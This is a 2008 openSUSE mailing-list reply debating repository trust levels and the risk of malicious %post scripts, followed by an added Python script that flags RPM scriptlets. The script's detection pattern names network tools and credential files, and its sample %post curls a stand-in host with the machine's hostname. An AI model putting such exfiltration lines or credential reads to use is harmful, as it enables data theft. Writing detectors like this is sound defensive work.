On Tue, Jul 29, 2008 at 11:50 AM, Adrian Schröter
> So here's my suggestion. First, keep the three "levels of trust" we have now: 1 = factory, 2 = established category projects like network:telephony, Apache, etc., 3 = home:user projects.
>
> Next, with each release of SUSE, create the normal SUSE distribution using level 1 stuff, but also create a new "3rd party distribution" containing the union of all level 2 projects, taken as a snapshot at release time. The "3rd party distribution" could be shipped as a separate set of ISO images and would also be hosted in a *single* online repository (called e.g., "openSUSE 10.3 3rdParty").
>
> This would have basically two effects:
>
> 1) The repository would cause plenty of conflicts, because we intentionally allow packagers to replace/update packages. It would cause a real dependency hell when installing any package in YaST.
Yes, that is a potential problem. However, why should package X exist in two different incarnations (not just _aggregate) in two different projects (not counting home:user projects)? It seems like the conflicts are caused by a separate underlying disorganization that should be fixed and has nothing to do with how you split up repos. Maybe I'm oversimplifying things?
> 2) Everybody would be able to inject evil code into everybody's system. (You do not even need to install a specific package; you would always get the package with a %post script sending your credit card credentials to someone else.) So no one should ever add this repo, simply because it is such an easy target that for sure plenty of people will do it.
>
> Seriously, I have seen code in configure scripts talking to an online server and sending private data often enough that I will never install software which is not trustable to some degree (or which I have reviewed myself).
So... are you saying that projects like Apache and network:telephony are not to be trusted? Then hmm, OBS just became a lot less useful to the world.

Yes, I agree there must be some kind of oversight to prevent evil %post scripts. This is true of any open source project. Perhaps this is an argument for setting up OSC commit mailing lists (like SVN commit emails) for each OBS project, so other members of the project can monitor changes... ?

In any case the trust question is an important one but is also a separate one: if you can't trust Apache and network:telephony together in one repository, then you can't trust them in two repositories either. Orthogonal question. So yes, the trust equation needs to be figured out. But separate from that, a single unified repository would be a lot more convenient, trustworthy or not.

-Archie

--
Archie L. Cobbs
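A defender-side check for the %post risk raised in this thread, added here as an example (it is not code from the thread or from the Build Service): it parses the output of `rpm -qp --scripts` for a package and flags scriptlets that invoke network tools or touch credential files. The header line format and the suspicious-pattern list are assumptions to tune for your own repositories.

```python
#!/usr/bin/env python3
"""Flag RPM scriptlets (%pre, %post, ...) that reach the network or read secrets."""
import re
import subprocess
from typing import Dict, List

# Assumed header form emitted by `rpm -qp --scripts`, e.g.
# "postinstall scriptlet (using /bin/sh):" or "postuninstall program: /sbin/ldconfig"
HEADER = re.compile(r"^(\w+) (?:scriptlet|program)(?: \(using [^)]*\))?:\s*(.*)$")

# Heuristic (assumed) patterns: network clients, URLs, and credential files.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|nc|ncat|netcat|socat|ssh|scp|ftp)\b"
    r"|/dev/tcp/|https?://|\.netrc|\.gnupg|\.ssh/|/etc/shadow"
)

def parse_scripts(text: str) -> Dict[str, str]:
    """Split rpm --scripts output into {scriptlet name: body}."""
    scripts: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = m.group(1)
            scripts[current] = m.group(2)  # "program:" form carries its body inline
            continue
        if current is not None:
            scripts[current] = (scripts[current] + "\n" + line).strip()
    return scripts

def find_suspicious(scripts: Dict[str, str]) -> List[str]:
    """Return the names of scriptlets whose body matches a suspicious pattern."""
    return [name for name, body in scripts.items() if SUSPICIOUS.search(body)]

def audit_rpm(path: str) -> List[str]:
    """Query a package file with rpm and return the flagged scriptlet names."""
    out = subprocess.run(["rpm", "-qp", "--scripts", path],
                         capture_output=True, text=True, check=True).stdout
    return find_suspicious(parse_scripts(out))

# Constructed sample mimicking rpm output: a benign %pre, a phoning-home %post.
SAMPLE = """preinstall scriptlet (using /bin/sh):
getent group foo >/dev/null || groupadd -r foo
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -s "https://example.invalid/installed?host=$(hostname)"
postuninstall program: /sbin/ldconfig
"""

if __name__ == "__main__":
    print(find_suspicious(parse_scripts(SAMPLE)))  # ['postinstall']
```

Run `audit_rpm("pkg.rpm")` against every package in a repository snapshot before enabling it; a non-empty result is a package to review by hand, not proof of malice.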